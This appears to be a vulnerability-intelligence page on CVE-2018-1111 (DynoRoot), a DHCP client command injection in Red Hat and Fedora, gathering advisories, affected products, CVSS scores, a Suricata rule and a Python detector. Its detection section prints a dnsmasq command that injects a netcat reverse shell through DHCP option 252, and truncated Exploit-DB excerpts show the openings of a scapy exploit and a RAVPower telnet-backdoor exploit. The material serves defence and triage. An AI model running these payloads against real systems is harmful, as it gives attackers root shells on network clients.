CVE-2018-1111
Published 2018-05-17
CVE-2018-1111: DHCP packages in Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier are vulnerable to a command injection flaw in the NetworkManager integration script…
Priority: P2 · 77 · high · CVSS 3.0: 7.5
Vector: AV:A / AC:H / PR:N / UI:N / S:U / C:H / I:H / A:H
ITW · EXPLOIT
Exploited in the wild
EPSS: 94.46% (99.8th percentile)
DHCP packages in Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier are vulnerable to a command injection flaw in the NetworkManager integration script included in the DHCP client. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol.
Affected
26 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fedora | dhcp | — | — |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| paloalto | pan-os | — | — |
| red_hat | dhcp | — | — |
| red_hat | dhcp | — | — |
| redhat | enterprise_linux | — | — |
| redhat | enterprise_linux | — | — |
| redhat | enterprise_linux | — | — |
| redhat | enterprise_linux | — | — |
| redhat | enterprise_linux | — | — |
| redhat | enterprise_linux | — | — |
| redhat | enterprise_linux | — | — |
| redhat | enterprise_linux | — | — |
| redhat | enterprise_linux | — | — |
| redhat | enterprise_linux | — | — |
| redhat | enterprise_linux_desktop | — | — |
| redhat | enterprise_linux_desktop | — | — |
| redhat | enterprise_linux_server | — | — |
| redhat | enterprise_linux_server | — | — |
| redhat | enterprise_linux_workstation | — | — |
| redhat | enterprise_linux_workstation | — | — |
| redhat | enterprise_virtualization | — | — |
| redhat | enterprise_virtualization | — | — |
Detection & IOCs (extracted from sources)
command: dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #"
- Alert on execution of /etc/NetworkManager/dispatcher.d/11-dhclient spawning unexpected child processes (e.g., nc, bash, touch) with root privileges, as this is the script exploited by the vulnerability.
- Detect the DHCP4_WPAD environment variable being set to a value containing shell metacharacters (', &, |, ;) before the 11-dhclient script is executed.
- Palo Alto Networks customers can use IPS signature 40739 to detect/block exploitation attempts against this vulnerability.
- Look for the pattern x'&<command> # in DHCP option 252 payloads on the wire; this is the canonical injection format used in both the PoC and Metasploit module.
- It is important to note that other characters may be used to perform this attack, such as | or ;, in addition to the & character demonstrated in the primary PoC.
- The vulnerability only affects systems where NetworkManager is running AND DHCP is configured as the network configuration method. Systems not using NetworkManager with DHCP are not impacted.
- Red Hat Enterprise Virtualization 4.1 ships vulnerable components but is not impacted in its default configuration because NetworkManager is turned off in the Management Appliance and not used with DHCP in the Hypervisor.
- RHEL 5 and RHEL 8 dhcp packages are NOT affected; only RHEL 6 and 7 (and derivatives such as CentOS 6/7, Fedora 26/27/28) are vulnerable.
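The option 252 check from the detection notes above, as an added Python example (not code from any of the sources listed on this page): it walks the options field of a DHCP server reply and reports which of the listed shell metacharacters appear in the WPAD value, wherever option 252 sits in the packet. The two packets are constructed inline, and `parse_options`, `suspicious_wpad` and `build_reply` are names chosen for this example.

```python
# Added example: flag DHCP option 252 (WPAD) values carrying shell metacharacters.
MAGIC_COOKIE = b"\x63\x82\x53\x63"   # marks the start of the DHCP options field
OPT_PAD, OPT_END, OPT_WPAD = 0, 255, 252
SHELL_METACHARS = set("'&|;")        # the characters named in the notes above


def parse_options(options: bytes) -> dict:
    """Walk the code/length/value options field; stop at END, fail on truncation."""
    parsed, i = {}, 0
    while i < len(options):
        code = options[i]
        if code == OPT_END:
            break
        if code == OPT_PAD:          # PAD is a single byte with no length field
            i += 1
            continue
        if i + 1 >= len(options):
            raise ValueError("truncated option header")
        length = options[i + 1]
        value = options[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError(f"option {code} truncated")
        # A repeated option code is concatenated, so a split value is still seen whole.
        parsed[code] = parsed.get(code, b"") + value
        i += 2 + length
    return parsed


def suspicious_wpad(bootp: bytes) -> list:
    """Return the sorted metacharacters found in option 252 ([] if clean or absent)."""
    # The fixed BOOTP header is 236 bytes; the magic cookie follows it.
    if len(bootp) < 240 or bootp[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message")
    wpad = parse_options(bootp[240:]).get(OPT_WPAD, b"")
    return sorted(SHELL_METACHARS.intersection(wpad.decode("latin-1")))


def build_reply(wpad: bytes) -> bytes:
    """Constructed DHCPACK (op=2); only the fields the parser reads are filled in."""
    header = b"\x02" + bytes(235)
    opts = bytes([53, 1, 5, OPT_WPAD, len(wpad)]) + wpad + bytes([OPT_END])
    return header + MAGIC_COOKIE + opts


# Constructed samples: a plain WPAD URL, and the pattern quoted on this page
# with its <command> placeholder left in place.
BENIGN = build_reply(b"http://wpad.example.test/wpad.dat")
FLAGGED = build_reply(b"x'&<command> #")

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN), ("flagged", FLAGGED)):
        print(name, suspicious_wpad(pkt))
```

A legitimate WPAD URL with a query string can contain `&`, so a hit is a lead for triage rather than proof of exploitation.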
CVSS provenance
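| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 7.5 | HIGH | CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.9 | HIGH | AV:A/AC:M/Au:N/C:C/I:C/A:C |
| vendor_redhat | | 7.5 | HIGH | |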
Palo Alto
PAN-SA-2025-0006 Informational Bulletin: Impact of OSS CVEs in PAN-OS
vendor_paloalto·2025-02-12·CVSS 7.1
CVE-2015-5312 [HIGH] PAN-SA-2025-0006 Informational Bulletin: Impact of OSS CVEs in PAN-OS
The Palo Alto Networks Product Security Assurance team has evaluated the following open source software (OSS) CVEs as they relate to PAN-OS software. While PAN-OS software may include the
CVEs: CVE-2015-5312, CVE-2016-4607, CVE-2016-4608, CVE-2016-4609, CVE-2016-4738, CVE-2018-1111, CVE-2018-14634, CVE-2018-18653, CVE-2019-0145, CVE-2019-8331, CVE-2020-0599, CVE-2020-14343, CVE-2020-14779, CVE-2020-27844, CVE-2020-29569, CVE-2021-21315, CVE-2021-27853, CVE-2021-27854, CVE-2021-27861, CVE-2021-27862, CVE-2021-3618, CVE-2021-3711, CVE-2022-2097, CVE-2022-22816, CVE-2022-40303, CVE-2022-41723, CVE-2022-41741, CVE-2022-41742, CVE-2023-3247, CVE-2023-38408, CVE-2023-44466, CVE-2023-50781, CVE-2023-50782, CVE-2024-12084, CV
Red Hat
dhcp: Command injection vulnerability in the DHCP client NetworkManager integration script
vendor_redhat·2018-05-15·CVSS 7.5
CVE-2018-1111 [HIGH] CWE-77 dhcp: Command injection vulnerability in the DHCP client NetworkManager integration script
A command injection flaw was found in the NetworkManager integration script included in the DHCP client packages in Red Hat Enterprise Linux. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw t
GHSA
GHSA-5jw9-5ff9-vr5p: DHCP packages in Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier are vulnerable to a command injection flaw in the NetworkManager integration
ghsa_unreviewed·2022-05-13
CVE-2018-1111 [HIGH] CWE-77 GHSA-5jw9-5ff9-vr5p: DHCP packages in Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier are vulnerable to a command injection flaw in the NetworkManager integration
Suricata
ET EXPLOIT DynoRoot DHCP - Client Command Injection
suricata·2018-06-29
CVE-2018-1111 ET EXPLOIT DynoRoot DHCP - Client Command Injection
Rule: alert udp any 67 -> any 68 (msg:"ET EXPLOIT DynoRoot DHCP - Client Command Injection"; content:"|02|"; depth:1; content:"|35 01 05 fc|"; distance:0; content:"|2f|bin|2f|sh"; fast_pattern; distance:0; reference:url,exploit-db.com/exploits/44652/; reference:cve,2018-1111; classtype:attempted-admin; sid:2025765; rev:2; metadata:attack_target Networking_Equipment, created_at 2018_06_29, cve CVE_2018_1111, deployment Datacenter, performance_impact Low, confidence Medium, signature_severity Critical, updated_at 2019_07_26, reviewed_at 2024_04_03, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
Exploit-DB
DHCP Client - Command Injection 'DynoRoot' (Metasploit)
exploitdb·2018-06-13·CVSS 7.5
CVE-2018-1111 [HIGH] DHCP Client - Command Injection 'DynoRoot' (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'DHCP Client Command Injection (DynoRoot)',
'Description' => %q{
This module exploits the DynoRoot vulnerability, a flaw in how the
NetworkManager integration script included in the DHCP client in
Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier
processes DHCP options. A malicious DHCP server, or an attacker on
the local network able to spoof DHCP responses, could use this flaw
to execute arbitrary commands with root privileges on systems using
NetworkManager and configured to obtain network configuration using
the DHCP protocol.
},
'Author' =>
[
'Felix Wilhelm'
Exploit-DB
DynoRoot DHCP Client - Command Injection
exploitdb·2018-05-18·CVSS 7.5
CVE-2018-1111 [HIGH] DynoRoot DHCP Client - Command Injection
---
# Exploit Title: DynoRoot DHCP - Client Command Injection
# Date: 2018-05-18
# Exploit Author: Kevin Kirsche
# Exploit Repository: https://github.com/kkirsche/CVE-2018-1111
# Exploit Discoverer: Felix Wilhelm
# Vendor Homepage: https://www.redhat.com/
# Version: RHEL 6.x / 7.x and CentOS 6.x/7.x
# Tested on: CentOS Linux release 7.4.1708 (Core) / NetworkManager 1.8.0-11.el7_4
# CVE : CVE-2018-1111
#!/usr/bin/env python
from argparse import ArgumentParser
from scapy.all import BOOTP_am, DHCP
from scapy.base_classes import Net
class DynoRoot(BOOTP_am):
function_name = "dhcpd"
def make_reply(self, req):
resp = BOOTP_am.make_reply(self, req)
if DHCP in req:
dhcp_options = [(op[0], {1: 2, 3: 5}.get(op[1], op[1]))
for op in req[DHCP].options
if
Exploit-DB
RAVPower 2.000.056 - Root Remote Code Execution
exploitdb·2018-01-24·CVSS 9.8
CVE-2018-5997 [CRITICAL] RAVPower 2.000.056 - Root Remote Code Execution
---
"""
# Exploit Title: RAVPower - remote root
# Date: 23/01/2018
# Exploit Authors: Daniele Linguaglossa
# Vendor Homepage: https://www.ravpower.com/
# Software Link: https://www.ravpower.com/
# Version: 2.000.056
# Tested on: OSX
# CVE : CVE-2018-5997
"""
import requests
import time
import telnetlib
PATH_PASSWD = "/etc"
FILE_PASSWD = "passwd"
PATH_VSTFUNC = "/etc/init.d"
FILE_VSTFUNC = "vstfunc"
FILE_RC = "/etc/rc.d/rc"
BACKDOOR_TERM = "export TERM=xterm"
BACKDOOR_TELNET = "/usr/sbin/telnetd &"
BASH_SHEBANG = "#!/bin/sh"
TELNETD = "/usr/sbin/telnetd -p 1111 &"
def upload(host, port, path, name, content):
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0"
path = "/upload.csp?uploadpath=%s&file=15158
Metasploit
DHCP Client Command Injection (DynoRoot)
metasploit
This module exploits the DynoRoot vulnerability, a flaw in how the NetworkManager integration script included in the DHCP client in Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier processes DHCP options. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol.
Bugzilla
CVE-2018-1111 dhcp: Command injection vulnerability in the DHCP client NetworkManager integration script [fedora-all]
bugzilla·2018-05-15·CVSS 7.5
CVE-2018-1111 [HIGH] CVE-2018-1111 dhcp: Command injection vulnerability in the DHCP client NetworkManager integration script [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this i
Bugzilla
CVE-2018-1111 dhcp: Command injection vulnerability in the DHCP client NetworkManager integration script
bugzilla·2018-04-16·CVSS 7.5
CVE-2018-1111 [HIGH] CVE-2018-1111 dhcp: Command injection vulnerability in the DHCP client NetworkManager integration script
A command injection vulnerability was found in 11-dhclient script provided by dhcp-client located in /etc/NetworkManager/dispatcher.d/11-dhclient. Attacker in local network who is able to spoof DHCP responses or malicious DHCP server can execute arbitrary commands run with root privileges on client system by exploiting this vulnerability.
Discussion:
Acknowledgments:
Name: Felix Wilhelm (Google Security Team)
---
Mitigation:
Please access https://access.redhat.com/security/vulnerabilities/3442151 for information on how to mitigate this issue.
---
External References:
https://access.redhat.com/security/vulnerabilities/3442151
---
(In reply to Adam Mariš from comment #0)
> A c
Unit42
Analysis of the DHCP Client Script Code Execution Vulnerability (CVE-2018-1111)
blogs_unit42·2018-07-16·CVSS 7.5
CVE-2018-1111 [HIGH] Analysis of the DHCP Client Script Code Execution Vulnerability (CVE-2018-1111)
In May 2018, a command injection flaw was found in the NetworkManager integration script included in the DHCP client packages in multiple versions of Red Hat Enterprise Linux (CVE-2018-1111), which has since been patched. An attacker could attack this vulnerability either through the use of a malicious DHCP server, or malicious, spoofed DHCP responses on the local network. A successful attack could execute arbitrary commands with root privileges on systems using NetworkManager with DHCP configured.
This vulnerability poses a serious threat to individuals or organizations running vulnerable instances of Red Hat Enterprise Linux versions 6 or 7, and patches should be applied immediately.
This blog post serves to help with your risk assessment and understanding of the vulnerability by providi
## Analysis of the DHCP Client Script Code Execution Vulnerability (CVE-2018-1111)
Jin Chen
Published: July 16, 2018
Threat Research
Vulnerabilities
CVE-2018-1111
Tenable
Advisory: Red Hat DHCP Client Command Injection Trouble
blogs_tenable·2018-05-17
References
- http://www.securityfocus.com/bid/104195
- http://www.securitytracker.com/id/1040912
- https://access.redhat.com/errata/RHSA-2018:1453
- https://access.redhat.com/errata/RHSA-2018:1454
- https://access.redhat.com/errata/RHSA-2018:1455
- https://access.redhat.com/errata/RHSA-2018:1456
- https://access.redhat.com/errata/RHSA-2018:1457
- https://access.redhat.com/errata/RHSA-2018:1458
- https://access.redhat.com/errata/RHSA-2018:1459
- https://access.redhat.com/errata/RHSA-2018:1460
- https://access.redhat.com/errata/RHSA-2018:1461
- https://access.redhat.com/errata/RHSA-2018:1524
- https://access.redhat.com/security/vulnerabilities/3442151
- https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-1111
- https://help.ecostruxureit.com/display/public/UADCE725/Security+fixes+in+StruxureWare+Data+Center+Expert+v7.6.0
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CDCLLCHYFFXW354HMB5QBXOQOY5BH2EJ/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IDJA4QRR74TMXW34Q3DYYFPVBYRTJBI7/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QMTTB54QNTPD2SK6UL32EVQHMZP6BUUD/
- https://www.exploit-db.com/exploits/44652/
- https://www.exploit-db.com/exploits/44890/
- https://www.tenable.com/security/tns-2018-10